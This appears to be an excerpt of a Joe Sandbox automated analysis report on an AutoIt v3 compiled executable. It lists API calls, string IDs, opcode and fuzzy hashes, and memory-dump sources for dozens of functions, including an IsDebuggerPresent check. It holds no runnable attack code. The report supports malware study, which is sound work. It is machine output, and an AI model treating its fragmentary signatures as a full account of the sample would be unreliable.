                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 753bf222a7e2c13856f8cda262024905f554f58d086a9d507e402b694298352f
                                                          • Instruction ID: eba03b280a11003fdc6a9286bee5dc4be148e8c4d76ee30dc6b0ef24d6056e8c
                                                          • Opcode Fuzzy Hash: 753bf222a7e2c13856f8cda262024905f554f58d086a9d507e402b694298352f
                                                          • Instruction Fuzzy Hash: C5418D30278207ABDB167F649C8DBBE36A9F749300F140515F981921A2CFF29CF29B61

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002A0C5B
                                                            • Part of subcall function 00261821: _memmove.LIBCMT ref: 0026185B
                                                          • _memset.LIBCMT ref: 00265787
                                                          • _wcscpy.LIBCMT ref: 002657DB
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002657EB
                                                          • __swprintf.LIBCMT ref: 002A0CD1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                          • String ID: Line %d: $AutoIt -
                                                          • API String ID: 230667853-4094128768
                                                          • Opcode ID: 59213d1697aa2c0cccc36371599d28361eab6105e7575dee243ee745a1d872bc
                                                          • Instruction ID: 319f0e8fdd0d770c8f9cfc64e909bc5e15aab582a7ef7b6b39d197538b87e5e0
                                                          • Opcode Fuzzy Hash: 59213d1697aa2c0cccc36371599d28361eab6105e7575dee243ee745a1d872bc
                                                          • Instruction Fuzzy Hash: 55418471428301AAD322EB60DC85BDF77ECAF45350F144A1EF585920A1DF70A6A9CB97

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002707EC
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002707F4
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002707FF
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0027080A
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00270812
                                                            • Part of subcall function 002707BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0027081A
                                                            • Part of subcall function 0026FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0025AC6B), ref: 0026FFA7
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0025AD08
                                                          • OleInitialize.OLE32(00000000), ref: 0025AD85
                                                          • CloseHandle.KERNEL32(00000000), ref: 00292F56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID: <w1$\t1$s1
                                                          • API String ID: 1986988660-884850715
                                                          • Opcode ID: 3bab7150e26b9016b6d50a480449a2ad2c5774de89bfb7fa4824d413860131a7
                                                          • Instruction ID: bd415d89ee234d44c9d514fbc996ee4ac5ad3f4d6fd1ab2cee23f79e75ec4d48
                                                          • Opcode Fuzzy Hash: 3bab7150e26b9016b6d50a480449a2ad2c5774de89bfb7fa4824d413860131a7
                                                          • Instruction Fuzzy Hash: F781DAB49682808ED38AEF2AED842E57FFDEB4C304B18C56AD419C72B2EB3004558F54

                                                          Control-flow Graph

                                                          • Control-flow graph image not captured (executed / not-executed colouring lost). Recoverable from the graph dump: a single basic block 2650db-26514b that calls CreateWindowExW twice and ShowWindow twice.
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00265109
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0026512A
                                                          • ShowWindow.USER32(00000000), ref: 0026513E
                                                          • ShowWindow.USER32(00000000), ref: 00265147
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: f1c8b78c6dc61182e8b28e71e713a538b8be205d9dbc3d494516d62ea2d43c02
                                                          • Instruction ID: 915a7a9a680d5da9f56afb06e4a9dbfddf485245d727250ded497fefa0e3708b
                                                          • Opcode Fuzzy Hash: f1c8b78c6dc61182e8b28e71e713a538b8be205d9dbc3d494516d62ea2d43c02
                                                          • Instruction Fuzzy Hash: 9CF03A715842947EEA321B236C8CEA72E7DD7CAF10F04841AB900A61B0C6B11893CAB0

                                                          Control-flow Graph

                                                          • Control-flow graph image not captured (executed / not-executed colouring lost). Recoverable from the graph dump: entry block 2b9b16; every call in the graph is to an internal routine (264a8c, 2b9cf1, 264ab2, 27593c, 2b96c4, 2b8f0e, 2b90c1, 272f85); no direct Win32 call is made from this function.
                                                          APIs
                                                            • Part of subcall function 00264A8C: _fseek.LIBCMT ref: 00264AA4
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DE1
                                                            • Part of subcall function 002B9CF1: _wcscmp.LIBCMT ref: 002B9DF4
                                                          • _free.LIBCMT ref: 002B9C5F
                                                          • _free.LIBCMT ref: 002B9C66
                                                          • _free.LIBCMT ref: 002B9CD1
                                                            • Part of subcall function 00272F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00279C54,00000000,00278D5D,002759C3), ref: 00272F99
                                                            • Part of subcall function 00272F85: GetLastError.KERNEL32(00000000,?,00279C54,00000000,00278D5D,002759C3), ref: 00272FAB
                                                          • _free.LIBCMT ref: 002B9CD9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 1552873950-2806939583
                                                          • Opcode ID: e8d7cff71c4c7639e8c43d5bdce185cf227744023f01335ea16bc7ab6fa4bfb9
                                                          • Instruction ID: 2e0a44dbcde393885de9d25cd7c834b8dcc832ec7d61117e13c5b80e2a04330f
                                                          • Opcode Fuzzy Hash: e8d7cff71c4c7639e8c43d5bdce185cf227744023f01335ea16bc7ab6fa4bfb9
                                                          • Instruction Fuzzy Hash: 405148B1914219AFDB24DFA4DC81AEEBBB9FF48304F10409EF249A3241DB715E948F58
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                          • Instruction ID: 4395ed3e4599604cc18bd94377fb26265c41cc30aa050baca7c27679e47a1741
                                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                          • Instruction Fuzzy Hash: F851B930A21B16DBDB289F69C88566EF7A5AF40320F24C729F82D961D0D7F09D709F40
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002552E6
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0025534A
                                                          • TranslateMessage.USER32(?), ref: 00255356
                                                          • DispatchMessageW.USER32(?), ref: 00255360
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchTranslate
                                                          • String ID:
                                                          • API String ID: 1795658109-0
                                                          • Opcode ID: d87cb6ab5ebb443e280b404063b57ed8ab956894ce23b359a9fc2b4edc8c37ec
                                                          • Instruction ID: 87b4af01a37bcb35fb530a0ac081afbe917e1cb0d7178ca9d609d18bfb26ade7
                                                          • Opcode Fuzzy Hash: d87cb6ab5ebb443e280b404063b57ed8ab956894ce23b359a9fc2b4edc8c37ec
                                                          • Instruction Fuzzy Hash: CF314630968702ABDB318F64DC54BF537F89B15301F284099E916871E0D3F098AEE715
                                                          APIs
                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00251275,SwapMouseButtons,00000004,?), ref: 002512A8
                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00251275,SwapMouseButtons,00000004,?), ref: 002512C9
                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00251275,SwapMouseButtons,00000004,?), ref: 002512EB
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Control Panel\Mouse
                                                          • API String ID: 3677997916-824357125
                                                          • Opcode ID: 423e604490a6cde5a0258ad0e59d774d3bc0aeb23563bdfecc59d12441560de7
                                                          • Instruction ID: 0daf5b7652cdb21b0af42c3bfc6efc828c3eb4a703421955fdfd14178c245731
                                                          • Opcode Fuzzy Hash: 423e604490a6cde5a0258ad0e59d774d3bc0aeb23563bdfecc59d12441560de7
                                                          • Instruction Fuzzy Hash: 8A114871920218BFDB20CFA4DC84FBEBBA8EF04742F004559EC05D7110D2719E6497A4
                                                          APIs
                                                            • Part of subcall function 0027593C: __FF_MSGBANNER.LIBCMT ref: 00275953
                                                            • Part of subcall function 0027593C: __NMSG_WRITE.LIBCMT ref: 0027595A
                                                            • Part of subcall function 0027593C: RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,?,00000004,?,?,00271003,?), ref: 0027597F
                                                          • std::exception::exception.LIBCMT ref: 0027101C
                                                          • __CxxThrowException@8.LIBCMT ref: 00271031
                                                            • Part of subcall function 002787CB: RaiseException.KERNEL32(?,?,?,0030CAF8,?,?,?,?,?,00271036,?,0030CAF8,?,00000001), ref: 00278820
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID: `=.$h=.
                                                          • API String ID: 3902256705-258339085
                                                          • Opcode ID: cbbae9ef702eb7a33658652078c01272732016b2ec04c80d05f6a9558d157bad
                                                          • Instruction ID: 54c606bfbc4ed85d64f6a2879d3eb80c955a85640c17c45943c85cee92e23d71
                                                          • Opcode Fuzzy Hash: cbbae9ef702eb7a33658652078c01272732016b2ec04c80d05f6a9558d157bad
                                                          • Instruction Fuzzy Hash: 77F0F43457421EE2CB20EA98DC199DEB7AC9F01310F508055FD0C92181DFB09BB0CAE1
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,002E2C4C), ref: 002B3F57
                                                          • GetLastError.KERNEL32 ref: 002B3F66
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 002B3F75
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002E2C4C), ref: 002B3FD2
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 57ca252f61f8d26012a55b17968d626367b7e1c7e1f95fbd1ad997108ea86a84
                                                          • Instruction ID: 900cd343c892dc5e1cc992e50c34b4ab6c09b992db28f1dee5f286584d60cf06
                                                          • Opcode Fuzzy Hash: 57ca252f61f8d26012a55b17968d626367b7e1c7e1f95fbd1ad997108ea86a84
                                                          • Instruction Fuzzy Hash: 822191709692019F8700DF28D8C58AEB7F4BE593A4F144A1DF499C76A1D730DAAACF42
                                                          APIs
                                                          • _memset.LIBCMT ref: 00265B58
                                                            • Part of subcall function 002656F8: _memset.LIBCMT ref: 00265787
                                                            • Part of subcall function 002656F8: _wcscpy.LIBCMT ref: 002657DB
                                                            • Part of subcall function 002656F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002657EB
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00265BAD
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00265BBC
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 002A0D7C
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: c1d59446ae18ffc2a8c61581fd944aaf01949dee620bba4de55c4d98cf3b67c7
                                                          • Instruction ID: d55221d8f963cc1044881a16b607bbcdde140c13ae7eebb2491c571180ea43c4
                                                          • Opcode Fuzzy Hash: c1d59446ae18ffc2a8c61581fd944aaf01949dee620bba4de55c4d98cf3b67c7
                                                          • Instruction Fuzzy Hash: 29214971524B949FE7728B64C8D9FEABBECEF02308F04048DE68A56181C7B029D5CB41
                                                          APIs
                                                            • Part of subcall function 002649C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002627AF,?,00000001), ref: 002649F4
                                                          • _free.LIBCMT ref: 0029FB04
                                                          • _free.LIBCMT ref: 0029FB4B
                                                            • Part of subcall function 002629BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00262ADF
                                                          Strings
                                                          • Bad directive syntax error, xrefs: 0029FB33
                                                          Similarity
                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                          • String ID: Bad directive syntax error
                                                          • API String ID: 2861923089-2118420937
                                                          • Opcode ID: 519432a1a0662c322c27cfc945ae7d8d662e7bf6e08815dd63a594326df66d56
                                                          • Instruction ID: 719b143fb7aca0d66763f352ac963aaf83ff9950e144c7f418b1443c726416f9
                                                          • Opcode Fuzzy Hash: 519432a1a0662c322c27cfc945ae7d8d662e7bf6e08815dd63a594326df66d56
                                                          • Instruction Fuzzy Hash: 72916C71920219AFCF44EFA4C9919EEB7B4BF09314F14442AE816EB291DB70A965CF50
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: AU3! ?.$EA06
                                                          • API String ID: 4104443479-2891994544
                                                          • Opcode ID: 34818efcef1a275741acf36d2035232c74397bfc3c5d4e86e484426e72df9927
                                                          • Instruction ID: 8e3f26cae1d742da585a446f2bc7142b921cb38d7b824105aca68d54fd96c6ff
                                                          • Opcode Fuzzy Hash: 34818efcef1a275741acf36d2035232c74397bfc3c5d4e86e484426e72df9927
                                                          • Instruction Fuzzy Hash: 1C416B21A751985BDF21AF648C917BF7BA18F46300F684075E8C2A7286CA649DF487E1
                                                          APIs
                                                            • Part of subcall function 00264AB2: __fread_nolock.LIBCMT ref: 00264AD0
                                                          • _wcscmp.LIBCMT ref: 002B9DE1
                                                          • _wcscmp.LIBCMT ref: 002B9DF4
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: ce74ca86a60915105f0d0510c3ed98fb61f510fe552dc2b5e8eb0a8eae741f35
                                                          • Instruction ID: 71eb4ecadd42aa9894bbece2a63a48f97f130409bce5a7ac344c963e113d75ef
                                                          • Opcode Fuzzy Hash: ce74ca86a60915105f0d0510c3ed98fb61f510fe552dc2b5e8eb0a8eae741f35
                                                          • Instruction Fuzzy Hash: 21411871A1020ABADF21EEE0CC45FEFB7BDDF45710F00406AFA00A7281D6719D948BA4
                                                          APIs
                                                          • _memset.LIBCMT ref: 002A032B
                                                          • GetOpenFileNameW.COMDLG32(?), ref: 002A0375
                                                            • Part of subcall function 00270284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00262A58,?,00008000), ref: 002702A4
                                                            • Part of subcall function 002709C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 002709E4
                                                          Similarity
                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                          • String ID: X
                                                          • API String ID: 3777226403-3081909835
                                                          • Opcode ID: 986b75503aa33d92bd2164870dc25dec20ab24f0c3b5ca8f5157bcfa7f0e1c5b
                                                          • Instruction ID: 42b92fe32423a6dfe9090c53e27503fe44f45b644af57e1de5c7bdbaafb36ce1
                                                          • Opcode Fuzzy Hash: 986b75503aa33d92bd2164870dc25dec20ab24f0c3b5ca8f5157bcfa7f0e1c5b
                                                          • Instruction Fuzzy Hash: B821A571A212889BDF41DF94D845BEE7BFCAF49304F00405AE408A7281DBF55A9DDFA1
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52bf12bb1d4979301b042ab074d025e7caaff174a26efcf1db3d9f42f9cc2ea7
                                                          • Instruction ID: 7bf3ed01478cf35aae3bb6251974802ca863252bbf1b4435694efd7ebfdc79bc
                                                          • Opcode Fuzzy Hash: 52bf12bb1d4979301b042ab074d025e7caaff174a26efcf1db3d9f42f9cc2ea7
                                                          • Instruction Fuzzy Hash: CEF126716183419FC714DF28C484A6ABBE5FF88318F148A2EF8999B351D770E955CF82
                                                          APIs
                                                          • _memset.LIBCMT ref: 002659F9
                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00265A9E
                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00265ABB
                                                          Similarity
                                                          • API ID: IconNotifyShell_$_memset
                                                          • String ID:
                                                          • API String ID: 1505330794-0
                                                          • Opcode ID: a0d499200ea65ec64204ebf2ce8bd71cdee5410ba472ead645d7696e0d379b42
                                                          • Instruction ID: 422d0a2ca1848ffe09add21c8d74f889d2f958d73f43deaad909bd65ae388ed7
                                                          • Opcode Fuzzy Hash: a0d499200ea65ec64204ebf2ce8bd71cdee5410ba472ead645d7696e0d379b42
                                                          • Instruction Fuzzy Hash: 0A318FB0515B118FC721DF64D8C4697BBF8FB48304F000E2EF59A87250E7B1A995CB92
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 00275953
                                                            • Part of subcall function 0027A39B: __NMSG_WRITE.LIBCMT ref: 0027A3C2
                                                            • Part of subcall function 0027A39B: __NMSG_WRITE.LIBCMT ref: 0027A3CC
                                                          • __NMSG_WRITE.LIBCMT ref: 0027595A
                                                            • Part of subcall function 0027A3F8: GetModuleFileNameW.KERNEL32(00000000,003153BA,00000104,00000004,00000001,00271003), ref: 0027A48A
                                                            • Part of subcall function 0027A3F8: ___crtMessageBoxW.LIBCMT ref: 0027A538
                                                            • Part of subcall function 002732CF: ___crtCorExitProcess.LIBCMT ref: 002732D5
                                                            • Part of subcall function 002732CF: ExitProcess.KERNEL32 ref: 002732DE
                                                            • Part of subcall function 00278D58: __getptd_noexit.LIBCMT ref: 00278D58
                                                          • RtlAllocateHeap.NTDLL(016E0000,00000000,00000001,?,00000004,?,?,00271003,?), ref: 0027597F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: 1af2bf9c48f30a2f6f0071ceb0bf611b5b90794024d9f06b187c0787ebc04e2f
                                                          • Instruction ID: 7d31eb74115bf52696542c3a37a05577b24975bad94b15d6bbade3b37e55bda7
                                                          • Opcode Fuzzy Hash: 1af2bf9c48f30a2f6f0071ceb0bf611b5b90794024d9f06b187c0787ebc04e2f
                                                          • Instruction Fuzzy Hash: 8001F932271B23DAE6116F359C4166EB2489F92770F50C826F61C9A1D1DEF08D214AE1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: 06ee8998f684ecd9cb596dd9fb2b86b31ee9b0b52a61e58af1407f923af4dd2b
                                                          • Instruction ID: c3dfe180c8426228bdf6cef4c3f07cff9f762e0514ababb450db71ab37474f56
                                                          • Opcode Fuzzy Hash: 06ee8998f684ecd9cb596dd9fb2b86b31ee9b0b52a61e58af1407f923af4dd2b
                                                          • Instruction Fuzzy Hash: 14327B74528312DFCB24DF14C494A2AB7E1BF44301F55895DE88A8B362DB71ECA9CF86
                                                          APIs
                                                          • _strcat.LIBCMT ref: 002CE20C
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • _wcscpy.LIBCMT ref: 002CE29B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf_strcat_wcscpy
                                                          • String ID:
                                                          • API String ID: 1012013722-0
                                                          • Opcode ID: b35a65edba573cd0bfbee3405199468811df82d98e5cfd4e0ca7498939ac583f
                                                          • Instruction ID: 5afdcfd7672768862790613c31cf9788ad6e3b0157ebf20bd0c4696e53cdf3fe
                                                          • Opcode Fuzzy Hash: b35a65edba573cd0bfbee3405199468811df82d98e5cfd4e0ca7498939ac583f
                                                          • Instruction Fuzzy Hash: F4912635A20514DFCB18EF18C491E69BBE5EF49314B55819DE80A8F3A2DB30ED65CF84
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 0fbe69b39b9815c525586b288db122452a7d1e1e0d6b1900dd1bcf9fd48ac3a2
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: BA31B271A2010ADBD718DF58C4C0969F7A6FF59300B64CAA5E40ACB751EB71EDE5CB80
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00265FEF
                                                            • Part of subcall function 0027359C: __lock.LIBCMT ref: 002735A2
                                                            • Part of subcall function 0027359C: DecodePointer.KERNEL32(00000001,?,00266004,002A8892), ref: 002735AE
                                                            • Part of subcall function 0027359C: EncodePointer.KERNEL32(?,?,00266004,002A8892), ref: 002735B9
                                                            • Part of subcall function 00265F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00265F18
                                                            • Part of subcall function 00265F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00265F2D
                                                            • Part of subcall function 00265240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0026526C
                                                            • Part of subcall function 00265240: IsDebuggerPresent.KERNEL32 ref: 0026527E
                                                            • Part of subcall function 00265240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002652E6
                                                            • Part of subcall function 00265240: SetCurrentDirectoryW.KERNEL32(?), ref: 00265366
                                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0026602F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmp
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
